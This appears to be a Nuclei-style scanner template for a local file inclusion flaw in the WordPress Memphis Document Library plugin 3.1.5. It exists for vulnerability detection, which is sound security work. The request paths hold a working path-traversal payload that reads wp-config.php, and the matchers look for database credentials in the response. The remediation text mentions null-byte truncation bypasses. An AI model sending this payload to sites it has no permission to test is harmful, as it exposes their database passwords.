id: wp-memphis-documents-library-lfi
info:
  name: WordPress Plugin Memphis Document Library 3.1.5 LFI
  author:
  - l0ne1y
  description: |-
    WordPress Plugin memphis-documents-library local file inclusion vulnerability
    WordPress is a blogging platform developed by the WordPress Foundation using the PHP language. The platform supports setting up personal blog websites on PHP and MySQL servers. memphis-documents-library is a document library plug-in used to organize and distribute files.

    A local file inclusion vulnerability exists in version 3.1.5 of the WordPress memphis-documents-library plugin.
  severity: critical
  remediation: |-
    Official fix:
    1. It is recommended that users go to the official website to obtain the latest patches or the latest version of the program: https://wordpress.org/plugins/memphis-documents-library/#developers

    Temporary fix:
    1. Use open_basedir configuration in PHP to restrict access to specified areas and truncate the path length.
    2. Filter. (dot)/(backslash)\\(backslash), encoding bypass
    3. Disable server remote file inclusion
    4. For the situation where the included file suffix is ​​restricted, the PHP version is less than 5.3, php.ini magic_quotes_gpc = off, and the addslashes function is not used for controllable parameters. If these three conditions are met, %00 truncation can be used.
    5. Question mark, pound sign, and space bypass (remote)
requests:
- matchers:
  - type: word
    condition: and
    part: body
    words:
    - DB_NAME
    - DB_PASSWORD
  - type: status
    status:
    - 200
  matchers-condition: and
  path:
  - '{{BaseURL}}/mdocs-posts/?mdocs-img-preview=../../../wp-config.php'
  - '{{BaseURL}}/?mdocs-img-preview=../../../wp-config.php'
  method: GET
